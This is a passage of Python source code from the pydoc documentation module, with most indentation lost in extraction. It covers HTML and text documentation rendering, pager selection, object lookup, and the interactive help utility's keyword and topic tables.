note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.__func__
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
            args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
                inspect.getfullargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
                # XXX lambdas won't usually have func_annotations['return']
                # since the syntax doesn't support it, but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
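# Usage sketch (illustrative, assumes the standard library json package):
# HTMLDoc renders a complete page for any documentable object.  In practice
# the shared module-level 'html' instance defined further below is used.
#
#     >>> import json
#     >>> htmldoc = HTMLDoc()
#     >>> page = htmldoc.page('Python: json', htmldoc.document(json, 'json'))
#     >>> page.startswith('<!DOCTYPE html')
#     True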
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
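# Usage sketch (illustrative): TextRepr keeps one-line summaries readable by
# letting cram() shorten long reprs with an ellipsis in the middle.
#
#     >>> r = TextRepr().repr('x' * 500)
#     >>> '...' in r and len(r) < 120
#     True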
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python source
files. It may be incomplete, incorrect or include features that are considered
implementation detail and may vary between Python implementations. When in
doubt, consult the module reference at the location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if hasattr(value, '__call__') or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.__func__
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
                # XXX lambdas won't usually have func_annotations['return']
                # since the syntax doesn't support it, but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
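# Usage sketch (illustrative): TextDoc emphasizes names by overstriking
# (char, backspace, char), which pagers such as 'less' render as bold;
# _PlainTextDoc produces the same layout without the control characters and
# is what doc() uses when writing to an ordinary file object.
#
#     >>> '\b' in TextDoc().document(len)
#     True
#     >>> '\b' in _PlainTextDoc().document(len)
#     False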
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
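# Note: the first call to pager() rebinds the module-level name to whatever
# concrete implementation getpager() selects ($PAGER, 'less', 'more',
# ttypager or plainpager), so the choice is made only once per process.
#
#     >>> pager('line one\nline two\n')   # pages or prints, depending on tty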
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
        # os.environ values are strings, so coerce before the arithmetic.
        r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
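# Usage sketch (illustrative):
#
#     >>> import inspect, json
#     >>> describe(inspect)
#     'module inspect'
#     >>> describe(json)
#     'package json'
#     >>> describe(len)
#     'built-in function len'
#     >>> describe(dict)
#     'class dict'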
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(builtins, path):
return getattr(builtins, path)
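# Usage sketch (illustrative): locate() imports as much of the dotted path as
# it can, then walks the remaining attributes; unknown names yield None.
#
#     >>> locate('os.path.join').__name__
#     'join'
#     >>> locate('len') is len
#     True
#     >>> locate('no.such.thing') is None
#     True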
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
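# Usage sketch (illustrative): render_doc() builds the text that doc() either
# pages or writes to the supplied output stream; a different renderer (for
# example the plaintext instance below) can be passed in.
#
#     >>> render_doc(len).splitlines()[0]
#     'Python Library Documentation: built-in function len in module builtins'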
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
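# Usage sketch (illustrative): writedoc() drops an HTML file named after the
# resolved object into the current working directory.
#
#     >>> writedoc('json')        # doctest: +SKIP
#     wrote json.html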
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = list(sorted(items))
colw = width // columns
rows = (len(items) + columns - 1) // columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
